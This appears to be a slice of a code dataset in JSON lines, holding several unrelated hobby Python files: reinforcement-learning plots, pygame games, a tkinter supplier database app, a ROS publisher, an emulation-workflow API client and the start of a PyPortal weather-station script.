plt.xlabel('Episodes')\n plt.ylabel('Steps Elapse')\n plt.legend(loc = 2)\n\n axes = plt.axes([0.55, 0.3, 0.3, 0.5])\n plt.title('Final Convergence')\n plt.plot(np.arange(1, EPISODE_NUM + 1)[-treshold:], sarsa_elapse[-treshold:])\n plt.plot(np.arange(1, EPISODE_NUM + 1)[-treshold:], qlearning_elapse[-treshold:])\n plt.plot(np.arange(1, EPISODE_NUM + 1)[-treshold:], Esarsa_elapse[-treshold:])\n plt.plot(np.arange(1, EPISODE_NUM + 1)[-treshold:], sarsaLambda_elapse[-treshold:])\n #plt.setp(axes)\n plt.show()\n \n plt.figure(figsize = (20,8))\n sarsa_elapse = np.add.accumulate(sarsa_elapse)\n qlearning_elapse = np.add.accumulate(qlearning_elapse)\n Esarsa_elapse = np.add.accumulate(Esarsa_elapse)\n sarsaLambda_elapse = np.add.accumulate(sarsaLambda_elapse)\n plt.plot(sarsa_elapse, np.arange(1, EPISODE_NUM + 1),label = \"SARSA\")\n plt.plot(qlearning_elapse, np.arange(1, EPISODE_NUM + 1), label = \"Q-learning\")\n plt.plot(Esarsa_elapse, np.arange(1, EPISODE_NUM + 1), label = \"Expect-SARSA\")\n plt.plot(sarsaLambda_elapse, np.arange(1, EPISODE_NUM + 1), label = \"SARSA-lambda\")\n\n plt.xlabel('Total Steps Elapse')\n plt.ylabel('Episodes')\n plt.legend()\n plt.show()\n\n # display the optimal policy\n fianl_policy = []\n for i in range(0, HEIGHT):\n fianl_policy.append([])\n for j in range(0, WIDTH):\n if [i, j] == GOAL:\n fianl_policy[-1].append('G')\n continue\n elif [i,j] in WALLS:\n fianl_policy[-1].append('X')\n continue\n \n best_action = np.argmax(Q_VALUES_4[i, j, :]) # show the best policy for SARSA method\n if best_action == world.ACTION_UP:\n fianl_policy[-1].append('U')\n elif best_action == world.ACTION_DOWN:\n fianl_policy[-1].append('D')\n elif best_action == world.ACTION_LEFT:\n fianl_policy[-1].append('L')\n elif best_action == world.ACTION_RIGHT:\n fianl_policy[-1].append('R')\n print(\"THe optimal last policy is:\")\n for row in fianl_policy:\n print(row)\n return result_1,result_2, result_3, result_4\n\nresult_1,result_2, result_3, result_4 = Main(EPISODE_NUM = 400)","repo_name":"login-invalid/RL_Introduction_FinalProject","sub_path":"codes/HW_final.py","file_name":"HW_final.py","file_ext":"py","file_size_in_byte":19447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29287908834","text":"\n'''\n\n#### Q 5 :->\n\n\nlst=[1,1,5,100,20,20,6,0,0]\nc=0\nfor i in range(len(lst)-1):\n if lst[i]==lst[i+1]:\n c+=1\n\nprint(c)\n\n'''\n\n\n## 1. Check if a list contains an element\n'''\nlst=[1,1,5,100,20,20,6,0,0]\n\na=int(input())\nif a in lst:\n print(\"YES !!\")\nelse: \n print(\"NO !! \")\n'''\n'''\nlst=[1,1,5,100,20,20,6,0,0]\n## 2. frequency of each element in the array\nfre=[]\nfor i in lst:\n c=lst.count(i)\n\n fre.append(c)\n\nprint(fre)\n\n\n\n## 3. Rotate list to left \nlst=[1,2,3,4,5]\nd=int(input())\n\nfor i in range(d):\n val=lst.pop(0)\n lst.append(val)\n\nprint(lst)\n\nfor i in range(len(lst)-1,-1,-1):\n print(lst[i])\n\nlst=lst[::-1]\nfor i in lst:\n print(i)\n'''\nlst=[1,2,3,4,5]\n\nfor i in range(len(lst)):\n if i%2!=0:\n\n print(lst[i])","repo_name":"Borspankaj/Problem_solving","sub_path":"PRACTICE/list&tuple.py","file_name":"list&tuple.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"31588076626","text":"from math_game2 import Game\n\nfrom problem_bank import TimedBank, CountProblemFactory, TimedProblemFactory\n\nfrom generators import *\n\nfrom game_input import PlayerInput\n\nfrom game_display import ConsoleDisplay\n\nfrom sys import exit\n\n\ndef main():\n # p = ProblemBank([1, 2, 3])\n # for prob in p:\n # print(prob)\n\n # p = ProblemBank([1, 2, 3])\n # print(next(p))\n # print(next(p))\n # print(next(p))\n # for prob in p:\n # print(prob)\n\n # problems = [\n # factorial_problem(1),\n # factorial_problem(2),\n # factorial_problem(3),\n # factorial_problem(4),\n # factorial_problem(5),\n # factorial_problem(6),\n # factorial_problem(7),\n # factorial_problem(8),\n # factorial_problem(9),\n # ]\n generators = [\n AdditionGenerator(2, 100, 2, 100),\n SubtractionGenerator(2, 100, 2, 100),\n MultiplicationGenerator(2, 12, 2, 100),\n DivisionGenerator(2, 12, 2, 100),\n ]\n # bank = ProblemBank(problems)\n # bank = RandomBank(problems)\n # bank = TimedBank(problems, 10)\n # bank = CountProblemFactory(generators, 5)\n bank = TimedProblemFactory(generators, 10)\n display = ConsoleDisplay()\n game = Game(PlayerInput(), bank, display, 3)\n game.play()\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt as k:\n print(\"bye bye!!!\")\n exit()\n","repo_name":"kevinmccall/math-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26088471346","text":"import pygame\nimport settings\n\nfrom base import BaseState\n\n\nclass RegionSelect(BaseState):\n def __init__(self):\n super(RegionSelect, self).__init__()\n self.active_index = 0\n self.index = -1\n self.next_state = \"REGION\"\n self.options = []\n self.rects = {0: [75, 20, 330, 680],\n 1: [475, 20, 330, 680],\n 2: [875, 20, 330, 680], }\n self.text_rects = {0: [80, 60, 300, 50],\n 1: [480, 600, 300, 50],\n 2: [880, 60, 300, 50], }\n self.image_pos = {0: (80, 120),\n 1: (480, 60),\n 2: (880, 180),}\n\n def startup(self, persistent):\n self.persist = persistent\n self.options = self.persist[\"world\"].get_options(self.persist[\"region_index\"])\n\n def handle_action(self, action):\n if action == \"return\":\n if self.index == 0 or self.index == 1 or self.index == 2:\n settings.SOUND_EFFECTS[\"Menu\"][\"Confirm_1\"].play()\n self.go_to_region()\n elif action == \"mouse_move\":\n for key, value in self.rects.items():\n if settings.click_check(value):\n if self.index != key:\n settings.SOUND_EFFECTS[\"Menu\"][\"Toggle_2\"].play()\n self.index = key\n break\n else:\n self.index = -1\n elif action == \"click\":\n if self.index == 0 or self.index == 1 or self.index == 2:\n settings.SOUND_EFFECTS[\"Menu\"][\"Confirm_1\"].play()\n self.go_to_region()\n elif action == \"right\":\n settings.SOUND_EFFECTS[\"Menu\"][\"Toggle_2\"].play()\n self.index += 1\n self.index %= len(self.options)\n elif action == \"left\":\n settings.SOUND_EFFECTS[\"Menu\"][\"Toggle_2\"].play()\n self.index -= 1\n self.index %= len(self.options)\n\n def get_event(self, event):\n if event.type == pygame.QUIT:\n self.quit = True\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n self.handle_action(\"left\")\n elif event.key == pygame.K_RIGHT:\n self.handle_action(\"right\")\n elif event.key == pygame.K_RETURN:\n self.handle_action(\"return\")\n elif event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n self.handle_action(\"click\")\n elif event.type == pygame.MOUSEMOTION:\n self.handle_action(\"mouse_move\")\n\n def go_to_region(self):\n self.persist['region_type'] = self.options[self.index]\n self.persist['region_generate'] = True\n self.done = True\n\n def draw(self, surface):\n surface.fill(pygame.Color(\"black\"))\n for key, value in self.rects.items():\n rect_color = (50, 50, 50)\n text_color = settings.TEXT_COLOR\n if self.index == key:\n rect_color = (80, 80, 80)\n text_color = settings.SELECTED_COLOR\n pygame.draw.rect(surface, rect_color, value, border_radius=4)\n surface.blit(settings.REGION_CARDS[self.options[key]], self.image_pos[key])\n settings.tw(surface, self.options[key], text_color, self.text_rects[key], settings.HEADING_FONT,\n x_mode=\"center\")\n","repo_name":"chasezielinski/NeonKnights","sub_path":"venv/states/region_select.py","file_name":"region_select.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29684586993","text":"from pythondb import *\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import simpledialog\n\ncurId = 0\nsaveFlag = False\nfindflag=False\nrsItem = \"\"\ncurData = 0\n\ndef componentEnableDisable(flag):\n global supName, supAdd, supMob, supAmount\n global Firstbtn, Nextbtn, Prevbtn, Lastbtn\n global Addbtn, Savebtn, Editbtn, Findbtn, Deletebtn, Cancelbtn\n if flag == True:\n st = NORMAL\n st1 = DISABLED\n else:\n st = DISABLED\n st1 = NORMAL\n\n supName.config(state=st)\n supAdd.config(state=st)\n supMob.config(state=st)\n supAmount.config(state=st)\n\n Firstbtn.config(state=st1)\n Prevbtn.config(state=st1)\n Nextbtn.config(state=st1)\n Lastbtn.config(state=st1)\n\n Addbtn.config(state=st1)\n Savebtn.config(state=st)\n Cancelbtn.config(state=st)\n Editbtn.config(state=st1)\n Findbtn.config(state=st1)\n Deletebtn.config(state=st1)\n\ndef cancelOperation():\n componentEnableDisable(False)\n\ndef addData():\n global saveFlag\n componentEnableDisable(True)\n supName.delete(0, END)\n supAdd.delete(0, END)\n supMob.delete(0, END)\n supAmount.delete(0, END)\n supName.focus_set()\n saveFlag = True\n\ndef editData():\n global saveFlag\n componentEnableDisable(True)\n saveFlag = False\n\ndef saveData():\n global saveFlag\n global supplierName, supplierAddress, supplierMobile, supplierAmount, var\n global con, sup\n if saveFlag == True:\n if supplierName != \"\" or supplierAddress != \"\" or supplierMobile != \"\" or supplierAmount != \"\":\n sql = \"insert into suppliersDetails(supplierName,supplierAddress,supplierMobile,supplierAmount,supplierCurrAmount) values('{}','{}','{}','{}','{}','{}')\".format(supplierName.get(), supplierAddress.get(), supplierMobile.get(), supplierAmount.get(), supplierAmount.get() )\n mycursor = con.cursor()\n mycursor.execute(sql)\n con.commit()\n messagebox.showinfo(\"Successful !\", \"Data has been Added to the Database.\", parent=sup)\n else:\n messagebox.showinfo(\"Warning !\", \"Please Fill the Entries first before saving.\")\n else:\n sql = \"update suppliersDetails set supplierName='{}' , supplierAddress='{}' , supplierMobile='{}' , supplierAmount='{}' where id={}\".format(supplierName.get(), supplierAddress.get(), supplierMobile.get(), supplierAmount.get(), curId)\n mycursor = con.cursor()\n mycursor.execute(sql)\n con.commit()\n messagebox.showinfo(\"Successful !\", \"Data has been Updated.\", parent=sup)\n LoadData()\n componentEnableDisable(False)\n\ndef findData():\n global con,rsItem,curData,sup,curId\n x = simpledialog.askinteger(\"Accounting and Inventory\", \"Enter the Supplier ID :\", parent=sup)\n cnt=0\n for itm in rsItem:\n if itm[0] == x:\n curData = cnt\n findflag = True\n break\n else:\n findflag = False\n cnt = cnt+1\n if findflag == False:\n messagebox.showinfo(\"Accounting and Inventory\", \"Supplier Not Present\", parent=sup)\n else:\n displayData(curData)\n\ndef deleteData():\n global con, sup, curId\n x = messagebox.askyesno(\"Accounting and Inventory\", \"Do You really want to Delete..?\", parent=sup)\n if x == True:\n sql = \"delete from suppliersDetails where id={}\".format(curId)\n print(curId)\n mycursor = con.cursor()\n mycursor.execute(sql)\n con.commit()\n messagebox.showinfo(\"Successful !\", \"Data has been Deleted to the Database.\", parent=sup)\n LoadData()\n\ndef exiting():\n global sup\n x = messagebox.askyesno(\"Accounting and Inventory\", \"Do You really want to Exit..?\", parent=sup)\n if x == True:\n sup.destroy()\n\ndef displayData(r):\n global supplierName, supplierAddress, supplierMobile, supplierAmount, var\n global rsItem, curId\n curId = rsItem[r][0]\n supplierName.set(rsItem[r][1])\n supplierAddress.set(rsItem[r][2])\n supplierMobile.set(rsItem[r][3])\n supplierAmount.set(rsItem[r][4])\n\ndef Lastdatabtn():\n global curData, rsItem\n componentEnableDisable(False)\n curData = len(rsItem) - 1\n displayData(curData)\n\ndef Nextdatabtn():\n global curData, rsItem, sup\n componentEnableDisable(False)\n if curData < len(rsItem) - 1:\n curData = curData + 1\n displayData(curData)\n else:\n messagebox.showinfo(\"Sensible\", \"It is last record\", parent=sup)\n\ndef Prevdatabtn():\n global curData, rsItem, sup\n componentEnableDisable(False)\n if curData > 0:\n curData = curData - 1\n displayData(curData)\n else:\n messagebox.showinfo(\"Sensible\", \"It is first record\", parent=sup)\n\ndef Firstdatabtn():\n global curData\n componentEnableDisable(False)\n curData = 0\n displayData(curData)\n\ndef LoadData():\n global rsItem, curData, con\n sql = \"select * from suppliersDetails\"\n mycursor = con.cursor()\n mycursor.execute(sql)\n rsItem = mycursor.fetchall()\n curData=0\n displayData(curData)\n\n\ndef supplierDetail(root):\n global sup\n sup = Toplevel(root)\n\n global supplierName, supplierAddress, supplierMobile, supplierAmount\n global supName, supAdd, supMob, supAmount\n global Firstbtn, Nextbtn, Prevbtn, Lastbtn\n global Addbtn, Savebtn, Editbtn, Findbtn, Deletebtn, Cancelbtn\n supplierName = StringVar()\n supplierAddress = StringVar()\n supplierMobile = StringVar()\n supplierAmount = IntVar()\n var = StringVar()\n\n sup.title(\"supplier Screen\")\n sup.config(bg=\"#ffcccc\")\n\n Label(sup, text=\"supplier Name : \", bg=\"#ffcccc\", font=(\"consolas\", 12)).place(x=120, y=20)\n supName = Entry(sup, textvariable=supplierName, width=50, state=DISABLED)\n supName.place(x=280, y=25)\n\n Label(sup, text=\"Address : \", bg=\"#ffcccc\", font=(\"consolas\", 12)).place(x=120, y=60)\n supAdd = Entry(sup, textvariable=supplierAddress, width=50, state=DISABLED)\n supAdd.place(x=280, y=65)\n\n Label(sup, text=\"Mobile No. : \", bg=\"#ffcccc\", font=(\"consolas\", 12)).place(x=120, y=100)\n supMob = Entry(sup, textvariable=supplierMobile, width=50, state=DISABLED)\n supMob.place(x=280, y=105)\n\n Label(sup, text=\"Amount : \", bg=\"#ffcccc\", font=(\"consolas\", 12)).place(x=120, y=140)\n supAmount = Entry(sup, textvariable=supplierAmount, width=50, state=DISABLED)\n supAmount.place(x=280, y=145)\n\n Firstbtn = Button(sup, text=\"<<\", width=\"10\", bg=\"black\", fg=\"white\", command=Firstdatabtn)\n Firstbtn.place(x=130, y=240)\n Prevbtn = Button(sup, text=\"<\", width=\"10\", bg=\"black\", fg=\"white\", command=Prevdatabtn)\n Prevbtn.place(x=250, y=240)\n Nextbtn = Button(sup, text=\">\", width=\"10\", bg=\"black\", fg=\"white\", command=Nextdatabtn)\n Nextbtn.place(x=370, y=240)\n Lastbtn = Button(sup, text=\">>\", width=\"10\", bg=\"black\", fg=\"white\", command=Lastdatabtn)\n Lastbtn.place(x=490, y=240)\n\n Addbtn = Button(sup, text=\"Add\", width=\"15\", bg=\"green\", fg=\"white\", command=addData)\n Addbtn.place(x=140, y=280)\n Savebtn = Button(sup, text=\"Save\", width=\"15\", bg=\"green\", fg=\"white\", state=DISABLED, command=saveData)\n Savebtn.place(x=300, y=280)\n Cancelbtn = Button(sup, text=\"Cancel\", width=\"15\", bg=\"green\", fg=\"white\", state=DISABLED,\n command=cancelOperation)\n Cancelbtn.place(x=450, y=280)\n Editbtn = Button(sup, text=\"Edit\", width=\"15\", bg=\"red\", fg=\"white\", command=editData)\n Editbtn.place(x=140, y=320)\n Findbtn = Button(sup, text=\"Find\", width=\"15\", bg=\"red\", fg=\"white\", command=findData)\n Findbtn.place(x=300, y=320)\n Deletebtn = Button(sup, text=\"Delete\", width=\"15\", bg=\"red\", fg=\"white\", command=deleteData)\n Deletebtn.place(x=450, y=320)\n\n Button(sup, text=\"Exit\", width=\"40\", bg=\"black\", fg=\"white\", command=exiting).place(x=210, y=360)\n\n LoadData()\n\n sup.geometry(\"700x500+300+100\")\n sup.mainloop()\n\n\n#supplierDetail()\n\n","repo_name":"Raspreets42/Accounting","sub_path":"supplier.py","file_name":"supplier.py","file_ext":"py","file_size_in_byte":7859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"42905041127","text":"#pylint:disable=C0411\n#pylint:disable=R0915\n#pylint:disable=R1724\n#pylint:disable=R1702\n#pylint:disable=R0912\n#pylint:disable=R0914\n#pylint:disable=C0114\n#pylint:disable=C0303\n#pylint:disable=R0913\n#pylint:disable=C0116\n#pylint:disable=W0622\n#pylint:disable=R0903\n#pylint:disable=C0115\n#pylint:disable=C0103\nimport pygame as pg\nimport random\nimport time\n\nclass Bullet:\n\tdef __init__ (self, bX, rY, winSize):\n\t\tself.bX = bX\n\t\tself.rY = rY\n\t\tif winSize == 0:\n\t\t\tself.rect = pg.Rect(self.bX, self.rY, 25, 25)\n\t\telif winSize == 1:\n\t\t\tself.rect = pg.Rect(self.bX, self.rY, 50, 50)\n \nclass Block:\n def __init__ (self, bX, bY, id):\n self.rect = pg.Rect(bX, bY, 50, 50)\n self.id = id\n\ndef scoreDisp(score, mScrn, window, playerX, playerY, hit):\n\t\tscoreFont = pg.font.Font('freesansbold.ttf', 50)\n\t\tgameOverSurf = scoreFont.render(\"Bullets: \" + str(score) + \" \" + \n\t\t#str(window.right) + \"x\" + str(window.bottom)\n\t\t #+ \" \" + str(playerX) + \"x\" + str(int(playerY)) + \n\t\t \" Hits: \" + str(hit), \n\t\t\t\t\t\t\t\t\tTrue, (255, 255, 255))\n\t\tgameOverRect = gameOverSurf.get_rect()\n\t\tgameOverRect.topleft = (50, 50)\n\t\tmScrn.blit(gameOverSurf, gameOverRect)\n\t\ndef gameOverDisp(mScrn):\n\t\tscoreFont = pg.font.Font('freesansbold.ttf', 50)\n\t\tgameOverSurf = scoreFont.render(\"Game Over\", True, (255, 255, 255))\n\t\tgameOverSurf2 = scoreFont.render(\"press 'r' to rest\", True, (255, 255, 255))\n\t\tgameOverRect = gameOverSurf.get_rect()\n\t\tgameOverRect2 = gameOverSurf2.get_rect()\n\t\tgameOverRect2.topleft = (mScrn.get_rect().right // 2.7, (mScrn.get_rect().bottom // 2) + 50)\n\t\tgameOverRect.topleft = (mScrn.get_rect().right // 2.5, mScrn.get_rect().bottom // 2)\n\t\tmScrn.blit(gameOverSurf, gameOverRect)\n\t\tmScrn.blit(gameOverSurf2, gameOverRect2)\n\t\t\ndef enemyMovement(enemyList):\n\tnewEList = []\n\trangeSet = [(200, 400), (500, 700), (800, 1000), (1100, 1300)]\n\tfor i in range(len(enemyList)):\n\t\t\tnewEList.append((Block(random.randint(rangeSet[i][0], rangeSet[i][1]), 150, 0), True))\n\treturn newEList\n\ndef main():\n\n\tpg.init()\n\n\trunning = True\n\twideScreen = False\n\n\tmScrn = pg.display.set_mode((0, 0))\n\twindow = mScrn.get_rect()\n\tif window.width >= window.height:\n\t\tmScrn = pg.display.set_mode((0, 0))\n\t\twideScreen = True\n\telse:\n\t\tmScrn = pg.display.set_mode((0, window.bottom // 2))\n\tclock = pg.time.Clock()\n\n\teffects = [pg.mixer.Sound('sound96.wav')]\n\n\tplayerX = 100\n\tplayerY = window.bottom // 1.6\n\tplayerSpeed = 100\n\n\tshotCycle = 0\n\tmoveCycle = 0\n\n\tbullets = []\n\tremBullets = 10\n\n\tenemyBlocks = [(Block(300, 150, 0), True), (Block(500, 150, 1), True), \n\t\t\t\t(Block(700, 150, 2), True), (Block(900, 150, 3), True)]\n\n\thits = 0\n\n\twhile running:\n\t\tclock.tick(60)\n\t\t\n\t\tscoreDisp(remBullets, mScrn, window, playerX, playerY, hits)\n\t\t\n\t\trect1 = pg.Rect(playerX, playerY, 50, 50)\n\t\n\t\tfor block in enemyBlocks:\n\t\t\tif block[1]:\n\t\t\t\tpg.draw.rect(mScrn, (0, 255, 0), block[0])\n\t\t\n\t\tfor r in bullets:\n\t\t\tif r.rect.y <= 0:\n\t\t\t\tbullets.remove(r)\n\t\t\t\tcontinue\n\n\t\t\tfor block in enemyBlocks:\n\t\t\t\tif pg.Rect.colliderect(r.rect, block[0]):\n\t\t\t\t\tbullets.remove(r)\n\t\t\t\t\tenemyBlocks.remove(block)\n\t\t\t\t\thits += 1\n\t\t\t\t\tcontinue \n\t\t\tif window.width <= 1920 and window.height <= 1080:\n\t\t\t\tpg.draw.rect(mScrn, (255, 255, 255), r.rect)\n\t\t\telse:\n\t\t\t\tpg.draw.rect(mScrn, (255, 255, 255), r.rect)\n\t\t\tr.rect.y -= 20\n\t\t\t\n\t\tif moveCycle >= 500:\n\t\t\tenemyBlocks = \t\t\t \t\t\t\t\tenemyMovement(enemyBlocks)\n\t\t\tmoveCycle = 0\n\t\t\n\t\tfor event in pg.event.get():\n\t\t\tif event.type == pg.QUIT:\n\t\t\t\trunning = False\n\n\t\t\tif event.type == pg.KEYDOWN:\n\t\t\t\tif event.key == pg.K_ESCAPE:\n\t\t\t\t\trunning = False\n \n\t\t\t\tif event.key == pg.K_a:\n\t\t\t\t\tif playerX - playerSpeed < (window.left):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tplayerX -= playerSpeed\n \n\t\t\t\tif event.key == pg.K_d:\n\t\t\t\t\tif playerX + 100 + playerSpeed > (window.right):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tplayerX += playerSpeed\n \n\t\t\t\tif event.key == pg.K_w:\n\t\t\t\t\tif playerY - playerSpeed < window.bottom // 2:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tplayerY -= playerSpeed\n \n\t\t\t\tif event.key == pg.K_s:\n\t\t\t\t\tif playerY + 100 + playerSpeed > (window.bottom // 1.5) and not wideScreen:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\telif playerY + 100 + playerSpeed > window.bottom and wideScreen:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tplayerY += playerSpeed\n \n\t\t\t\tif event.key == pg.K_j:\n\t\t\t\t\tif shotCycle >= 120 and remBullets >= 1:\n\t\t\t\t\t\teffects[0].play()\n\t\t\t\t\t\tremBullets -= 1\n\t\t\t\t\t\tif wideScreen:\n\t\t\t\t\t\t\tbullets.append(Bullet(rect1.left, rect1.y - 5, 0))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tbullets.append(Bullet(rect1.left, rect1.y - 5, 1))\n\t\t\t\t\t\tshotCycle = 0\n\n\t\t\t\t# DEBUGGING KEYS\n\t\t\t\tif event.key == pg.K_r:\n\t\t\t\t\tmain()\n\t\t\t\t\t\t\n\t\tmoveCycle += 5\n\t\tshotCycle += 5\n\t\t\t\t\t\n\t\tpg.draw.rect(mScrn, (255, 0, 0), rect1)\n\t\t\n\t\tif remBullets == 0 and len(bullets) <= 0 and len(enemyBlocks) > 0:\n\t\t\tmScrn.fill((0,0,0))\n\t\t\tgameOverDisp(mScrn)\n\t\t\n\t\tpg.display.flip()\n\t\t\n\t\tmScrn.fill((0,0,0))\n\n\nmain()\n\npg.quit()\n\t","repo_name":"sfernandez131/PyShooter","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7325616336","text":"#!/usr/bin/env python3\nimport rospy\nfrom std_msgs.msg import Int64\n\n\ndef start():\n rospy.init_node('talk.py')\n\n #create vars pubs and subs\n pubTosub = rospy.Publisher('NUM', Int64, queue_size = 10)\n\n global num\n num = 0\n\n rate = rospy.Rate(10) #10 hz\n\n while not rospy.is_shutdown():\n #do some stuff\n \n pubTosub.publish(num)\n num = num + 1\n\n\n rate.sleep()\n\n rospy.spin()\n\n\n\nif __name__ == '__main__':\n start()","repo_name":"jmorrow10/Tutorial-Code","sub_path":"catkin_ws/src/tutorials/src/talk.py","file_name":"talk.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31828110711","text":"import argparse\nimport json\nimport os\nimport pathlib\nimport re\nimport shutil\nimport sys\nimport time\nimport zipfile\n\nimport requests\n\nEMIL_BASE_URL = \"https://historic-builds.emulation.cloud/emil\"\nOUTPUT_DIR = \"/app/output\"\n# OUTPUT_DIR = \"output\"\n\n\ndef main():\n # parser = argparse.ArgumentParser(\n # \"Wrapper for the EAAS Workflow API, automatically starts a container based tool and retrieves the output!\")\n #\n # parser.add_argument(\"environmentId\", type=str, help=\"The Id of the environment.\")\n # parser.add_argument(\"-f\", \"--files\", nargs=\"*\")\n # parser.add_argument(\"-p\", \"--params\", nargs=\"*\")\n #\n # args = parser.parse_args()\n # env_id, files, params = args.environmentId, args.files, args.params\n #\n # print(\"Env ID\", env_id)\n # print(\"Data\", files)\n # print(\"Params\", params)\n\n # args = sys.argv\n # print(args)\n # env_id = args[1]\n #\n # files = []\n # params = {}\n #\n # index = 0\n # for i, file in enumerate(args[3:]):\n # if file in [\"-p\", \"--params\"]:\n # index = i + 4\n # break\n # files.append(file)\n #\n # for i2, param in enumerate(args[index:]):\n # params[i2] = param\n #\n # print(\"Env ID\", env_id)\n # print(\"Data\", files)\n # print(\"Params\", params)\n\n json_data = {}\n\n with open(\"config.json\") as config:\n json_data = json.load(config)\n\n files = json_data[\"inputFiles\"]\n input_files = {}\n for file_path in files:\n\n try:\n file = open(file_path, \"rb\")\n except Exception as e:\n print(\"Could not find file: \" + file_path)\n print(e)\n exit(1)\n\n req = requests.post(EMIL_BASE_URL + \"/upload?access_token=undefined\", files={\"file\": file})\n\n print(\"Got status:\", req.status_code, \"for file \", file_path)\n print(\"Got response: \", req.json())\n input_files[pathlib.Path(file_path).name] = req.json()[\"uploads\"][0]\n\n print(\"Starting Workflow!\")\n\n json_data[\"inputFiles\"] = input_files\n\n index = len(json_data[\"arguments\"])\n\n for key, val in json_data[\"unordered\"].items():\n # not specified or flags set to false\n if val in [\"null\", \"false\"]:\n continue\n # flags set to true\n elif val == \"true\":\n json_data[\"arguments\"][str(index)] = key\n index += 1\n # other arguments (lists/arrays not supported)\n else:\n json_data[\"arguments\"][str(index)] = key\n json_data[\"arguments\"][str(index + 1)] = val\n index += 2\n\n print(\"Sending Json: \", json_data)\n\n # TODO überall status checks, falls nicht richtiger status: error + stop\n wf_response = requests.post(EMIL_BASE_URL + \"/workflow/api/v1/workflow\",\n json=json_data)\n wait_queue_url = wf_response.json()[\"waitQueueUrl\"]\n\n while True:\n\n wait_queue_response = requests.get(wait_queue_url)\n q_json = wait_queue_response.json()\n\n if not q_json[\"isDone\"]:\n print(\"Tool is still running.\")\n time.sleep(5)\n else:\n print(\"Tool is done!\")\n result_url = q_json[\"resultUrl\"]\n break\n\n result_response = requests.get(result_url)\n blobstore_url = result_response.json()[\"url\"]\n print(\"Blobstore URL: \" + blobstore_url)\n\n blobstore_response = requests.get(blobstore_url)\n\n with open(OUTPUT_DIR + \"/files.zip\", \"wb\") as f:\n f.write(blobstore_response.content)\n\n with zipfile.ZipFile(OUTPUT_DIR + \"/files.zip\", \"r\") as zip_ref:\n zip_ref.extractall(OUTPUT_DIR)\n\n os.remove(OUTPUT_DIR + \"/files.zip\")\n\n # regex = re.compile(\"container-log-[a-z0-9\\-]*\\.log\")\n #\n print(\"Files in output: \")\n for root, dirs, files in os.walk(OUTPUT_DIR):\n for file in files:\n print(file)\n\n print(\"Done! Files stored at: \" + OUTPUT_DIR)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Aeolic/eaas-workflow-wrapper","sub_path":"wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35868845973","text":"import time\nimport board\nimport neopixel\nimport busio\nimport analogio\nfrom simpleio import map_range\nfrom digitalio import DigitalInOut\n\nfrom adafruit_esp32spi import adafruit_esp32spi, adafruit_esp32spi_wifimanager\nfrom adafruit_io.adafruit_io import IO_HTTP, AdafruitIO_RequestError\n\n# sensor libs\nimport adafruit_veml6075\nimport adafruit_sgp30\nfrom adafruit_bme280 import basic as adafruit_bme280\n\n# weatherstation graphics helper\nimport weatherstation_helper\n\n# rate at which to refresh the pyportal and sensors, in seconds\nPYPORTAL_REFRESH = 30\n\n# anemometer defaults\nanemometer_min_volts = 0.4\nanemometer_max_volts = 2.0\nmin_wind_speed = 0.0\nmax_wind_speed = 32.4\n\n# Get wifi details and more from a secrets.py file\ntry:\n from secrets import secrets\nexcept ImportError:\n print(\"WiFi secrets are kept in secrets.py, please add them there!\")\n raise\n\n# PyPortal ESP32 Setup\nesp32_cs = DigitalInOut(board.ESP_CS)\nesp32_ready = DigitalInOut(board.ESP_BUSY)\nesp32_reset = DigitalInOut(board.ESP_RESET)\nspi = busio.SPI(board.SCK, board.MOSI, board.MISO)\nesp = adafruit_esp32spi.ESP_SPIcontrol(spi, esp32_cs, esp32_ready, esp32_reset)\nstatus_light = neopixel.NeoPixel(board.NEOPIXEL, 1, brightness=0.2)\nwifi = adafruit_esp32spi_wifimanager.ESPSPI_WiFiManager(esp, secrets, status_light)\n\n# Set your Adafruit IO Username and Key in secrets.py\n# (visit io.adafruit.com if you need to create an account,\n# or if you need your Adafruit IO key.)\nADAFRUIT_IO_USER = secrets['aio_username']\nADAFRUIT_IO_KEY = secrets['aio_key']\n\n# Create an instance of the Adafruit IO HTTP client\nio = IO_HTTP(ADAFRUIT_IO_USER, ADAFRUIT_IO_KEY, wifi)\n\n# create an i2c object\ni2c = busio.I2C(board.SCL, board.SDA)\n\n# instantiate the sensor objects\nveml = adafruit_veml6075.VEML6075(i2c, integration_time=100)\nsgp30 = adafruit_sgp30.Adafruit_SGP30(i2c)\nbme280 = adafruit_bme280.Adafruit_BME280_I2C(i2c)\n# change this to match the location's pressure (hPa) at sea level\nbme280.sea_level_pressure = 1013.25\n\n# init. the graphics helper\ngfx = weatherstation_helper.WeatherStation_GFX()\n\n# init. the ADC\nadc = analogio.AnalogIn(board.D4)\n\n# Set up Adafruit IO Feeds\nprint('Getting Group data from Adafruit 